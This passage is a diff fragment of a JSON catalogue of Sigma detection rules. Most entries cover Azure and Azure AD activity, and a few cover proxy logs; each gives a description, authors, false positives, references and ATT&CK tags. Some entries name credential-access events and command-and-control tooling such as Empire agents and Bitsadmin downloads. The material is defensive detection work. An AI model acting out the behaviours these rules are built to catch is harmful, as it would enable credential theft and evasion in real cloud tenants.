+ ], + "filename": "azure_keyvault_key_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_keyvault_key_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact", + "attack.credential_access", + "attack.t1552", + "attack.t1552.001" + ] + }, + "uuid": "80eeab92-0979-4152-942d-96749e11df40", + "value": "Azure Keyvault Key Modified or Deleted" + }, + { + "description": "Identifies when a VPN connection is modified or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/08", + "falsepositive": [ + "VPN Connection being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "VPN Connection modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_vpn_connection_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_vpn_connection_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "61171ffc-d79c-4ae5-8e10-9323dba19cd3", + "value": "Azure VPN Connection Modified or Deleted" + }, + { + "description": "Detect failed authentications from countries you do not operate out of.", + "meta": { + "author": "MikeDuddington, '@dudders1'", + "creation_date": "2022/07/28", + "falsepositive": [ + "If this was approved by System Administrator." 
+ ], + "filename": "azure_ad_failed_auth_from_countries_you_do_not_operate_out_of.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_failed_auth_from_countries_you_do_not_operate_out_of.yml" + ], + "tags": [ + "attack.t1078" + ] + }, + "uuid": "28870ae4-6a13-4616-bd1a-235a7fad7458", + "value": "Failed Authentications From Countries You Do Not Operate Out Of" + }, + { + "description": "Detects when a configuration change is made to an applications AppID URI.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", + "creation_date": "2022/06/02", + "falsepositive": [ + "When and administrator is making legitimate AppID URI configuration changes to an application. This should be a planned event." + ], + "filename": "azure_app_appid_uri_changes.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#appid-uri-added-modified-or-removed", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_appid_uri_changes.yml" + ], + "tags": [ + "attack.t1528", + "attack.persistence", + "attack.credential_access" + ] + }, + "uuid": "1b45b0d1-773f-4f23-aedc-814b759563b1", + "value": "Application AppID Uri Configuration Changes" + }, + { + "description": "Detects when a Container Registry is created or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/07", + "falsepositive": [ + "Container Registry being created or deleted may be performed by a system administrator. 
Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Container Registry created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_container_registry_created_or_deleted.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://attack.mitre.org/matrices/enterprise/cloud/", + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", + "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_container_registry_created_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "93e0ef48-37c8-49ed-a02c-038aab23628e", + "value": "Azure Container Registry Created or Deleted" + }, + { + "description": "Detect failed attempts to sign in to disabled accounts.", + "meta": { + "author": "AlertIQ", + "creation_date": "2021/10/10", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_login_to_disabled_account.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_login_to_disabled_account.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078" + ] + }, + "uuid": "908655e0-25cf-4ae1-b775-1c8ce9cf43d8", + "value": "Login to Disabled Account" + }, + { + "description": "Detects when Events are 
deleted in Azure Kubernetes. An adversary may delete events in Azure Kubernetes in an attempt to evade detection.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/07/24", + "falsepositive": [ + "Event deletions may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Events deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_kubernetes_events_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://github.com/elastic/detection-rules/blob/da3852b681cf1a33898b1535892eab1f3a76177a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_events_deleted.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562", + "attack.t1562.001" + ] + }, + "uuid": "225d8b09-e714-479c-a0e4-55e6f29adf35", + "value": "Azure Kubernetes Events Deleted" + }, + { + "description": "User Added to an Administrator's Azure AD Role", + "meta": { + "author": "Raphaël CALVET, @MetallicHack", + "creation_date": "2021/10/04", + "falsepositive": [ + "PIM (Privileged Identity Management) generates this event each time 'eligible role' is enabled." 
+ ], + "filename": "azure_ad_user_added_to_admin_role.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://m365internals.com/2021/07/13/what-ive-learned-from-doing-a-year-of-cloud-forensics-in-azure-ad/", + "https://attack.mitre.org/techniques/T1098/003/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_user_added_to_admin_role.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098.003" + ] + }, + "uuid": "ebbeb024-5b1d-4e16-9c0c-917f86c708a7", + "value": "User Added to an Administrator's Azure AD Role" + }, + { + "description": "Identifies when a Azure Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate.\nKubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs.\nAn Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.\n", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/11/22", + "falsepositive": [ + "Azure Kubernetes CronJob/Job may be done by a system administrator.", + "If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "azure_kubernetes_cronjob.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/", + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://kubernetes.io/docs/concepts/workloads/controllers/job/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_cronjob.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.execution" + ] + }, + "uuid": "1c71e254-6655-42c1-b2d6-5e4718d7fc0a", + "value": "Azure Kubernetes CronJob" + }, + { + "description": "Detects guest users being invited to tenant by non-approved inviters", + "meta": { + "author": "MikeDuddington, '@dudders1'", + "creation_date": "2022/07/28", + "falsepositive": [ + "If this was approved by System Administrator." + ], + "filename": "azure_ad_guest_users_invited_to_tenant_by_non_approved_inviters.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-external-user-sign-ins", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_guest_users_invited_to_tenant_by_non_approved_inviters.yml" + ], + "tags": [ + "attack.t1078" + ] + }, + "uuid": "4ad97bf5-a514-41a4-abd3-4f3455ad4865", + "value": "Guest Users Invited To Tenant By Non Approved Inviters" + }, + { + "description": "Detects when a PIM elevation is approved or denied. 
Outside of normal operations should be investigated.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", + "creation_date": "2022/08/09", + "falsepositive": [ + "Actual admin using PIM." + ], + "filename": "azure_pim_activation_approve_deny.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_pim_activation_approve_deny.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1078" + ] + }, + "uuid": "039a7469-0296-4450-84c0-f6966b16dc6d", + "value": "PIM Approvals And Deny Elevation" + }, + { + "description": "Detects the creation or patching of potential malicious RoleBinding/ClusterRoleBinding.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/07", + "falsepositive": [ + "RoleBinding/ClusterRoleBinding being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "RoleBinding/ClusterRoleBinding modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "azure_kubernetes_rolebinding_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://attack.mitre.org/matrices/enterprise/cloud/", + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", + "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_rolebinding_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact", + "attack.credential_access" + ] + }, + "uuid": "25cb259b-bbdc-4b87-98b7-90d7c72f8743", + "value": "Azure Kubernetes RoleBinding/ClusterRoleBinding Modified and Deleted" + }, + { + "description": "Detects when highly privileged delegated permissions are granted on behalf of all users", + "meta": { + "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", + "creation_date": "2022/07/28", + "falsepositive": [ + "When the permission is legitimately needed for the app" + ], + "filename": "azure_app_delegated_permissions_all_users.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_delegated_permissions_all_users.yml" + ], + "tags": [ + "attack.privilege_escalation" + ] + }, + "uuid": "a6355fbe-f36f-45d8-8efc-ab42465cbc52", + "value": "Delegated Permissions Granted For All Users" + }, + { + "description": "Detects when app permissions (app 
roles) for other APIs are granted", + "meta": { + "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", + "creation_date": "2022/07/28", + "falsepositive": [ + "When the permission is legitimately needed for the app" + ], + "filename": "azure_app_permissions_for_api.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_permissions_for_api.yml" + ], + "tags": [ + "attack.privilege_escalation" + ] + }, + "uuid": "ba2a7c80-027b-460f-92e2-57d113897dbc", + "value": "App Permissions Granted For Other APIs" + }, + { + "description": "Identifies when a firewall is created, modified, or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/08", + "falsepositive": [ + "Firewall being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Firewall modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "azure_firewall_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_firewall_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "512cf937-ea9b-4332-939c-4c2c94baadcd", + "value": "Azure Firewall Modified or Deleted" + }, + { + "description": "Identifies when DNS zone is modified or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/08", + "falsepositive": [ + "DNS zone modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "DNS zone modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_dns_zone_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_dns_zone_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "af6925b0-8826-47f1-9324-337507a0babd", + "value": "Azure DNS Zone Modified or Deleted" + }, + { + "description": "Identifies when a Virtual Network is modified or deleted in Azure.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/08", + "falsepositive": [ + "Virtual Network being modified or deleted may be performed by a system administrator. 
Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Virtual Network modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_virtual_network_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_virtual_network_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "bcfcc962-0e4a-4fd9-84bb-a833e672df3f", + "value": "Azure Virtual Network Modified or Deleted" + }, + { + "description": "Monitor and alert for changes to the device registration policy.", + "meta": { + "author": "Michael Epping, '@mepples21'", + "creation_date": "2022/06/28", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_ad_device_registration_policy_changes.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#device-registrations-and-joins-outside-policy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_device_registration_policy_changes.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1484" + ] + }, + "uuid": "9494bff8-959f-4440-bbce-fb87a208d517", + "value": "Changes to Device Registration Policy" + }, + { + "description": "Detect when users are authenticating without MFA being required.", + "meta": { + "author": "MikeDuddington, '@dudders1'", + "creation_date": "2022/07/27", + "falsepositive": [ + "If this was approved by System Administrator." 
+ ], + "filename": "azure_ad_only_single_factor_auth_required.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_only_single_factor_auth_required.yml" + ], + "tags": [ + "attack.t1078" + ] + }, + "uuid": "28eea407-28d7-4e42-b0be-575d5ba60b2c", + "value": "Azure AD Only Single Factor Authentication Required" + }, + { + "description": "Monitor and alert for sign-ins where the device was non-compliant.", + "meta": { + "author": "Michael Epping, '@mepples21'", + "creation_date": "2022/06/28", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_ad_sign_ins_from_noncompliant_devices.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#non-compliant-device-sign-in", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_sign_ins_from_noncompliant_devices.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1078" + ] + }, + "uuid": "4f77e1d7-3982-4ee0-8489-abf2d6b75284", + "value": "Sign-ins from Non-Compliant Devices" + }, + { + "description": "Detects when a new admin is created.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H', Tim Shelton", + "creation_date": "2022/08/11", + "falsepositive": [ + "A legitimate new admin account being created" + ], + "filename": "azure_privileged_account_creation.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#changes-to-privileged-accounts", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_privileged_account_creation.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1078" + ] + }, + "uuid": "f7b5b004-dece-46e4-a4a5-f6fd0e1c6947", + "value": "Privileged Account Creation" + }, + { + "description": "Identifies when a device in azure is no longer managed or compliant", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/03", + "falsepositive": [ + "Administrator may have forgotten to review the device." + ], + "filename": "azure_device_no_longer_managed_or_compliant.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#core-directory", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_device_no_longer_managed_or_compliant.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "542b9912-c01f-4e3f-89a8-014c48cdca7d", + "value": "Azure Device No Longer Managed or Compliant" + }, + { + "description": "Monitor and alert on group membership removal of groups that have CA policy modification access", + "meta": { + "author": "Mark Morowczynski '@markmorow', Thomas Detzner '@tdetzner'", + "creation_date": "2022/08/04", + "falsepositive": [ + "User removed from the group is approved" + ], + "filename": "azure_group_user_removal_ca_modification.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_group_user_removal_ca_modification.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "665e2d43-70dc-4ccc-9d27-026c9dd7ed9c", + "value": "User 
Removed From Group With CA Policy Modification Access" + }, + { + "description": "Detects when there is a interruption in the authentication process.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/11/26", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_unusual_authentication_interruption.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_unusual_authentication_interruption.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078" + ] + }, + "uuid": "8366030e-7216-476b-9927-271d79f13cf3", + "value": "Azure Unusual Authentication Interruption" + }, + { + "description": "Detection for when multi factor authentication has been disabled, which might indicate a malicious activity to bypass authentication mechanisms.", + "meta": { + "author": "@ionsor", + "creation_date": "2022/02/08", + "falsepositive": [ + "Authorized modification by administrators" + ], + "filename": "azure_mfa_disabled.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/authentication/howto-mfa-userstates", + "https://attack.mitre.org/techniques/T1556/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_mfa_disabled.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1556" + ] + }, + "uuid": "7ea78478-a4f9-42a6-9dcd-f861816122bf", + "value": "Disabled MFA to Bypass Authentication Mechanisms" + }, + { + "description": "Device code flow is an OAuth 2.0 protocol flow specifically for input constrained devices and is not used in all environments.\nIf this type of flow is seen in the environment and not being used in an input constrained device 
scenario, further investigation is warranted.\nThis can be a misconfigured application or potentially something malicious.\n", + "meta": { + "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", + "creation_date": "2022/06/01", + "falsepositive": [ + "Applications that are input constrained will need to use device code flow and are valid authentications." + ], + "filename": "azure_app_device_code_authentication.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-authentication-flows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_device_code_authentication.yml" + ], + "tags": [ + "attack.t1078", + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.initial_access" + ] + }, + "uuid": "248649b7-d64f-46f0-9fb2-a52774166fb5", + "value": "Application Using Device Code Authentication Flow" + }, + { + "description": "Detects when end user consent is blocked due to risk-based consent.", + "meta": { + "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", + "creation_date": "2022/07/10", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_app_end_user_consent_blocked.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#end-user-stopped-due-to-risk-based-consent", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_end_user_consent_blocked.yml" + ], + "tags": [ + "attack.privilege_escalation" + ] + }, + "uuid": "7091372f-623c-4293-bc37-20c32b3492be", + "value": "End User Consent Blocked" + }, + { + "description": "Detects when an account is disabled or blocked for sign in but 
tried to log in", + "meta": { + "author": "Yochana Henderson, '@Yochana-H'", + "creation_date": "2022/06/17", + "falsepositive": [ + "Account disabled or blocked in error", + "Automation account has been blocked or disabled" + ], + "filename": "azure_blocked_account_attempt.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_blocked_account_attempt.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110" + ] + }, + "uuid": "4afac85c-224a-4dd7-b1af-8da40e1c60bd", + "value": "Account Disabled or Blocked for Sign in Attempts" + }, + { + "description": "Identifies when a Point-to-site VPN is Modified or Deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/08", + "falsepositive": [ + "Point-to-site VPN being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Point-to-site VPN modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "azure_network_p2s_vpn_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_network_p2s_vpn_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "d9557b75-267b-4b43-922f-a775e2d1f792", + "value": "Azure Point-to-site VPN Modified or Deleted" + }, + { + "description": "Identifies when secrets are modified or deleted in Azure.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/16", + "falsepositive": [ + "Secrets being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Secrets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "azure_keyvault_secrets_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_keyvault_secrets_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact", + "attack.credential_access", + "attack.t1552", + "attack.t1552.001" + ] + }, + "uuid": "b831353c-1971-477b-abb6-2828edc3bca1", + "value": "Azure Keyvault Secrets Modified or Deleted" + }, + { + "description": "Identifies when a Azure Kubernetes network policy is modified or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/07", + "falsepositive": [ + "Network Policy being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Network Policy being modified and deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "azure_kubernetes_network_policy_change.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://attack.mitre.org/matrices/enterprise/cloud/", + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", + "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_network_policy_change.yml" + ], + "tags": [ + "attack.impact", + "attack.credential_access" + ] + }, + "uuid": "08d6ac24-c927-4469-b3b7-2e422d6e3c43", + "value": "Azure Kubernetes Network Policy Change" + }, + { + "description": "Identifies when a service account is modified or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/07", + "falsepositive": [ + "Service account being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Service account modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "azure_kubernetes_service_account_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://attack.mitre.org/matrices/enterprise/cloud/", + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", + "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_service_account_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "12d027c3-b48c-4d9d-8bb6-a732200034b2", + "value": "Azure Kubernetes Service Account Modified or Deleted" + }, + { + "description": "Detects suspicious user agent strings used in APT malware in proxy logs", + "meta": { + "author": "Florian Roth, Markus Neis", + "creation_date": "2019/11/12", + "falsepositive": [ + "Old browsers" + ], + "filename": "proxy_ua_apt.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_apt.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "6ec820f2-e963-4801-9127-d8b2dce4d31b", + "value": "APT User Agent" + }, + { + "description": "Detects suspicious User Agent strings that end with an equal sign, which can be a sign of base64 encoded values used as User Agent string", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/07/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_ua_susp_base64.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No 
established product", + "refs": [ + "https://blogs.jpcert.or.jp/en/2022/07/yamabot.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_susp_base64.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "894a8613-cf12-48b3-8e57-9085f54aa0c3", + "value": "Suspicious Base64 User Agent" + }, + { + "description": "Detects user agent and URI paths used by empire agents", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/07/13", + "falsepositive": [ + "Valid requests with this exact user agent to server scripts of the defined names" + ], + "filename": "proxy_empire_ua_uri_combos.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://github.com/BC-SECURITY/Empire", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_empire_ua_uri_combos.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "b923f7d6-ac89-4a50-a71a-89fb846b4aa8", + "value": "Empire UserAgent URI Combo" + }, + { + "description": "Detects Bitsadmin connections to domains with uncommon TLDs", + "meta": { + "author": "Florian Roth, Tim Shelton", + "creation_date": "2019/03/07", + "falsepositive": [ + "Rare programs that use Bitsadmin and update from regional TLDs e.g. 
